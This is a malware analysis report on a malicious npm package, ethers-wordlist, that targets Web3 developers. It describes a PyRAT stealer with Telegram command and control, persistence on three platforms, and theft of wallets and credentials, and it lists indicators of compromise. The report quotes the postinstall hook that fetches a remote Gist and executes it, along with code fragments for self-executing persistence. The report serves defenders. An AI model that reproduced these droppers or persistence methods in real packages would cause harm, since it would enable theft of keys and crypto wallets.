ethers-wordlist - Remote Gist Dropper Delivering PyRAT Cross-Platform Stealer
One of ten packages in the long01 cluster targeting Web3/Solidity developers. ethers-wordlist@1.0.0 is a malicious npm package whose postinstall hook fetches build_utils.py from a GitHub Gist (guellemilb) via curl/wget and executes it via python3 or node with eval(). The fetched payload is PyRAT v3, a fully-featured cross-platform Python RAT written in Chinese. On install it beacons to a Telegram C2, installs platform-appropriate persistence (crontab/bashrc on Linux, launchd plist/zshrc on macOS, HKCU Run registry/Startup folder on Windows), then runs a full credential sweep: browser-stored wallet extension data (14 wallets including MetaMask, Phantom, Rabby), browser passwords and cookies filtered to crypto exchanges, SSH private keys, AWS credentials, .env files, .npmrc, git config, and macOS Keychain. The RAT then enters a polling C2 loop accepting commands for on-demand re-stealing, arbitrary shell execution, and remote file download.
Package
Threat Actor
Unknown — Chinese-language toolingTags
Postinstall Fetcher — Fileless Remote Payload
The package contains no malicious code directly. The entire payload is retrieved at install time from a GitHub Gist, making the npm package itself appear clean to static scanners. Three fetch methods are tried in sequence to maximise cross-platform coverage, with all errors silenced. The eval() call executes whatever the Gist currently contains in the Node process context, meaning the actor can update the payload at any time without republishing the package.
package.json — postinstall fetcher
"postinstall": "node -e \"var p=require('child_process');
p.exec('curl -s https://gist.githubusercontent.com/guellemilb/
631fb6348967d9d475125edf67048c0e/raw/build_utils.py | python3 2>/dev/null
|| curl -s [...] | node 2>/dev/null
|| wget -qO- [...] | python3 2>/dev/null',
function(e,o){if(o)try{eval(o)}catch(x){}});\""
PyRAT v3 — Cross-Platform RAT with Telegram C2
The fetched payload identifies itself as PyRAT 跨平台轻量版 v3 (Cross-platform lightweight edition v3), written entirely in Chinese. On execution it immediately sends an installation beacon to the Telegram C2, then installs persistence, runs a full credential sweep, and enters a polling loop checking for operator commands every 5 minutes. The C2 loop accepts /偷 (steal), /状态 (status), /执行 (execute shell command), and /下载 (download file) commands — giving the operator full interactive access to the victim machine.
Persistence — All Three Platforms
The RAT base64-encodes itself and installs a self-replicating loader via whichever mechanism is available. On Linux it writes to crontab (every 10 minutes) and ~/.bashrc. On macOS it drops a launchd plist to ~/Library/LaunchAgents/ com.apple.utility.plist (masquerading as an Apple system agent) with a 600-second run interval, and appends to ~/.zshrc. On Windows it writes to HKCU Run as PyRATUpdater and drops SystemHelper.bat to the Startup folder. All persistence mechanisms execute the base64-encoded payload via python3 -c.
build_utils.py — macOS launchd persistence
plist路径 = os.path.join(启动代理目录, "com.apple.utility.plist")
# Label: com.apple.utility — masquerades as Apple system agent
# RunAtLoad: true, StartInterval: 600
# Executes: python3 -c 'import base64,sys;exec(base64.b64decode("<self>"))'
Credential and Wallet Theft
The stealer targets 14 browser wallet extensions by Chrome extension ID, reading LevelDB and SQLite stores from Chrome, Chromium, Brave, Edge, Opera, and OperaGX across all three platforms. Browser Login Data SQLite databases are queried for passwords on crypto exchange and developer service domains (Binance, Coinbase, OKX, GitHub, AWS, Google). Browser Cookies databases are filtered to the same exchange domain list. Platform credential sweeps collect .env files (recursive walk to depth 3), SSH private keys (id_rsa, id_ed25519, id_ecdsa), AWS credentials, .gitconfig, .npmrc, and on macOS attempts macOS Keychain queries via the security binary. On Windows it additionally queries the Windows Credential Manager via cmdkey /list and scans Desktop/Documents/Downloads for .txt/.log/.cfg files containing credential keywords.
build_utils.py — wallet extension ID list (14 wallets)
钱包列表 = {
"MetaMask": "nkbihfbeogaeaoehlefnkodbefgpgknn",
"Phantom": "bfnaelmomeimhlpmgjnjophhpkkoljpa",
"Rabby": "acmacodkjbdgmoleebolmdjonilkdbch",
"Coinbase": "hnfanknocfeofbddgcijnmhnfnkdnaad",
"Trust Wallet": "egjidjbpglichdcondbcbdnbgprllpj",
"OKX Wallet": "mcohilncbfahbmgdjkbpemcciiolgcge",
"Keplr": "dmkamcknogkgcdfhhbddcghachkejeap",
"Backpack": "akiplfofhhnmdmakkkkccomkflnemflk",
"TronLink": "ibnejdfjmmkpcnlpebklmnkoeoihofec",
# ... and 5 more
}
Indicators of Compromise
Malicious Packages
| Package | Version | Author | Notes |
|---|---|---|---|
| ethers-wordlist | 1.0.0 | long01 | Fetcher package; no malicious code on disk; payload retrieved from Gist at install time |
Domains
| Domain | Type | Context |
|---|---|---|
| api.telegram.org | c2 | Sole C2 channel; polling every 300 seconds; bot token 8668865248; chat_id 6015173223 |
URLs
| URL | Context |
|---|---|
| hxxps://gist.githubusercontent[.]com/guellemilb/631fb6348967d9d475125edf67048c0e/raw/build_utils.py | Live remote payload — PyRAT v3; actor (GitHub: guellemilb) can update without touching npm package |
| hxxps://api.telegram[.]org/bot8668865248:AAH9nO1iWx6aBKDm4I8CdErS-R8T5lvPNOo/sendMessage | Telegram C2 beacon and exfiltration endpoint; chat_id 6015173223 |
Targeted File Paths
| Path | Context |
|---|---|
| ~/Library/LaunchAgents/com.apple.utility.plist | macOS persistence; masquerades as Apple system agent; RunAtLoad + 600s interval |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PyRATUpdater | Windows registry persistence key |
| %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SystemHelper.bat | Windows Startup folder persistence |
| ~/.bashrc / ~/.zshrc | Linux/macOS shell profile persistence |
| ~/.ssh/id_rsa, id_ed25519, id_ecdsa | SSH private keys exfiltrated in full |
| ~/.aws/credentials | AWS credential file |
Environment Variables / Config Paths
| Artefact | Context |
|---|---|
| Browser wallet extension LocalStorage/LevelDB | 14 wallets targeted by Chrome extension ID across 6 browsers |
| Browser Login Data / Cookies | Filtered to crypto exchanges: Binance, Coinbase, OKX, Bybit, KuCoin, gate.io, Kraken |